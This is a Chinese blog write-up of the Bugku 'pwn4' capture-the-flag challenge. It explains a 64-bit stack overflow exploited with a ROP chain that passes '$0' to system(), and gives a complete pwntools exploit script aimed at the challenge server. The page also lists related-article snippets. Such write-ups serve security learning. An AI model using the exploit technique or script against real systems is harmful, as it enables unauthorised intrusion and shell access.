Bugku-pwn4详解

最新推荐文章于 2022-09-28 01:04:20 发布
最新推荐文章于 2022-09-28 01:04:20 发布
阅读量4.3k 收藏 9
点赞数 5
分类专栏: ctf pwn学习 文章标签: bugku pwn4 pwn4
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/casuall/article/details/95865447
版权

这道题来自bugku的第三道pwn题,pwn4。首先进行一些常规检查。

pwn4_1.png

一个64位动态链接的程序,没有开什么保护

然后用IDA打开,有个危险函数read,可以用来溢出。

pwn4_2.png

shift + F12查看有没有可疑字符串,然后在字符串上按x查看引用他的地方,找到了一个system函数

pwn4_3.png

但是system函数里面的字符串并不是我们想要的'/bin/sh',尝试用ROPgadget去搜索,命令为ROPgadget --binary pwn4 --string '/bin/sh',搜索无果。。。再回到IDA中检测字符串

pwn4_4.png

发现了一个$0$0在linux中为为shell或shell脚本的名称

system()会调用fork()产生子进程,由子进程来调用/bin/sh -c string来执行参数string字符串所代表的命令,此命令执行完后随即返回原调用的进程。

所以如果将$0作为system的参数,能达到传入'/bin/sh'一样的效果。

在这里插入图片描述

上面的图展示了$0bash中的值,可以看到一开始的进程只有两个,此时输出$0,得到的是bash本身,单独输入$0,可以看到多了一个bash进程。

有了system函数和$0作为参数,就可以进行溢出了。

还有要注意的就是64位程序和32位程序的传参方式不一样32位的函数调用使用栈传参64位的函数调用使用寄存器传参,分别用rdirsirdxrcxr8r9来传递参数(参数个数小于7的时候)。

我们利用ROPgadget工具进行查找,得到pop rdi ; ret$0的地址,system的地址直接在IDA中查看

pwn4_6.png

在这里插入图片描述

首先先填充缓冲区,大小为0x10,然后覆盖rbp,8个字节,传入pop rdi;ret的地址和$0,将栈中$0的地址弹出,存入rdi作为参数,在传入system地址进行调用。

下面是脚本

from pwn import *

context.log_level = 'debug'

conn = remote('114.116.54.89', 10004)
# conn = process('./pwn4')

pop_rdi = 0x00000000004007d3 
bin_sh = 0x000000000060111f
system = 0x000000000040075A

payload = 'A' * (0x10+8) + p64(pop_rdi) + p64(bin_sh) + p64(system)  

conn.recvuntil('Come on,try to pwn me')

conn.sendline(payload)

conn.interactive()

pwn4

Casuall
关注
  • 5
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 10
    评论
专栏目录
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
pwn4-bugku
weixin_45427676的博客
09-18 695
checksec 首先用checksec命令查看有没有什么保护机制 没有开任何保护机制,用IDA(64位)打开查看main函数。 函数分析 # memset函数 # setvbuf函数 # read函数 经过分析函数可以知道缓冲区中是&s,大小为0x10uLL,read函数是将大小为0x30uLL的数据存放到缓冲区&s中,其大小超过了缓冲区的大小,存在栈溢出。 s大小 ...
bugku_pwn4 | by AriSan
AriSan_XD的博客
06-01 203
bugku_pwn4 | by AriSan 先 checksec 发现为64位程序,而且没有打开任何保护 然后用ida看一下伪代码,嘿嘿,居然有一个 read 函数,明显的栈溢出。 用 gdb 在进入 read 之前下断点,观察此时 rbp 和 rsp 的值,得到栈空间大小为 0x70-0x60+8 继续ida可以发现很明显的 system 函数,但是却没有 "/bin/sh" ,所以 system 函数的参数需要我们自己传入,说到传参,这是一个64位的程序,而64位程序的前六个参数依次保存在 RD
bugku pwn4 学习
欢迎来到神林的博客
08-27 1143
2019-08-25 bugku pwn4 学习 1.拿到题目先file 一下文件看看文件属性 查看得知是64位动态链接库的文件。2.checksec 查看是否开启什么保护然而并没有什么保护PIE 保护指定是对代码段进行保护3.IDA查看内容 看到了敏感函数system,看着想办法跳转4.查看main函数,有栈溢出的敏感函数 read 想办法利用read 函数5.查看read函数栈中内容 完全能够...
bugku-PWN-瑞士军刀解析过程
weixin_46168073的博客
11-14 1827
一、启动场景 点进去,我发现点不进去,搞了半天,花了10个币才搞明白这个不是点的,而是连接的。 这里使用kali。 kali vmwar免安版本: 链接:https://pan.baidu.com/s/1SvbXZlx-0h5gN5__rOp2bg 提取码:1234 二、解题过程 安装kali之后,我们直接开大,然后输入nc 114.67.246.176 13340(端口有变是因为我重启了一次,这里输入,你的端口。) 然后ls,目录下有个flag目录,直接cat flag目录...
记一次bugku awd的pwn解
z1r0的博客
03-27 1970
今天闲得没事,随便逛逛的时候看到了bugku awd有战队开了房间,想着没什么事就报名玩了玩,不过pwn题还是很有意思的。 连上去发现是个堆题。。。再一看加固时间20分钟。。。。(瞬间无语住 直接在网上找题,结果发现网上都是2.23下的,这里笔者拿到的是2.27下的(再次瞬间无语住 没办法只好自己写exp了。拿到pwn附件就是一顿瞎分析,结果发现了upadte有堆溢出 再随便翻了翻发现还有一个uaf。 只不过没有show函数而已。 再看了一下保护 脑子里瞬间想好了攻击思路,申请到malloc_hoo
AWD比赛入门攻略总结
鹿鸣天涯
09-28 3968
AWD比赛入门攻略总结
bugku pwn1
PRCORANGE的博客
04-13 181
题目: nc 114.67.246.176 10846 nc:全称Netcat,用于连接远程服务器端口。连接后它会返回一个cmdshell用于执行命令(Linux自带该命令)。 在linux中连接服务器,再使用ls查看目录 cat flag
pwn学习-bugku
qq_45653588的博客
12-20 722
文章目录 0x00 pwn1 第一题很简单,nc连接后直接就有执行权限。 ls获取文件列表,cat flag就拿到了flag。 0x01 pwn2 第二题,下载文件,checksec查看文件保护和文件类型。 将文件拖入ida,发现了get_shell_函数 F5查看main函数代码,发现s申请了0x30个字节,而read函数,最大能读取0X100个字符,就造成了栈溢出,我们只要将返回地址覆盖为get_shell_的地址就可以得到flag。 查看get_shell_函数,可以直接输出flag,只要将m
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
ctf题库ctf-pwn赛题收集
03-31
ctf题库 CTF(夺旗赛)题库是一个由安全专家和爱好者们制作的一系列网络安全挑战。... ...每个类别都包含多个挑战,每个挑战都有一个或多个标志(flag)。参赛者必须通过解决每个挑战来获取相应的标志,然后提交标志以获得...
pwntools的简单使用
Casuall的博客
09-20 8359
pwntools是一个CTF框架和漏洞利用开发库,用Python开发,旨在让使用者简单快速的编写exploit。 这里简单的介绍一下pwntools的使用。 首先就是导入包 from pwn import * 你将在全局空间里引用pwntools的所有函数。现在可以用一些简单函数进行汇编,反汇编,pack,unpack等等操作。 将包导入后,我一般都会设置日志记录级别,方便出现问题的时候排查错误...
pwnable.kr-bof WP
Casuall的博客
03-24 5285
pwnable.kr-bof   这道题是一个简单的缓冲器溢出的题,首先要做这道题要对函数调用栈有一定的了解。 函数调用栈是指程序运行时内存一段连续的区域,用来保存函数运行时的状态信息,包括函数参数与局部变量等。称之为“栈”是因为发生函数调用时,调用函数(caller)的状态被保存在栈内,被调用函数(callee)的状态被压入调用栈的栈顶;在函数调用结束时,栈顶的函数(callee)状态被弹出,栈...
BugKu - pwn2
Casuall的博客
07-06 3638
这道题来自于bugku旧平台的第二道pwn题,还是比较简单的,一个典型的缓冲区溢出题。 首先查看一下文件类型,file pwn2,可以看到是64位的程序。然后用64位IDA打开,查看程序的逻辑。 可以看到这个程序的逻辑比较简单,有一个read函数,这个函数一个危险函数,可能引发缓冲区溢出漏洞。常见的危险函数还有gets、strcpy、sprintf、scanf等。 然后查看字符串,看看是否有内置...
攻防世界 Mary_Morto WP 三种解法
Casuall的博客
08-16 1558
Mary_Morto保护措施简介解题思路方法一:方法二:方法三: 来自于ASIS-CTF-Finals-2017的一道题,网上的wp都千篇一律,这里记录一下我的一些思路。 首先这道题可以从好几种方向去解,我这里介绍三种解法。 首先我们查看一下程序的保护措施,发现开启了Stack Canary和NX,RELRO和PIE没有开启。然后运行一下,提示选择我们的武器,第一个是栈溢出漏洞,第二个是格式化字符串漏洞,说明本题应该可以利用这个两个漏洞去解决问题。 保护措施简介 我们先简单的回顾一下这些保护措施是做什么用
攻防世界xctf-实时数据监测 wp
Casuall的博客
08-14 1254
本题是一个简单的格式化字符串漏洞的利用。先查看一些文件的信息,32位的程序,保护措施没有开。 用IDA查看一些伪代码,发现main函数里面只有一个locker函数,locker函数首先接受了一个字符串s,然后调用imagemagic函数,这个函数跟进去查看其实就是一个printf函数,最后比较key的值是不是为0x2223322,如果相等,返回shell,否则打印key的地址和值。 我们在本地运行一下看看,由于直接把key的地址告诉你了,所以本题的思路是找到格式化字符串地址的偏移,然后覆盖key的值。格
mqtt-pwn安装
最新发布
09-20
安装mqtt-pwn的步骤如下: 1. 克隆mqtt-pwn仓库:使用命令`git clone https://github.com/akamai-threat-research/mqtt-pwn.git`将mqtt-pwn仓库克隆到本地。 2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 10
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值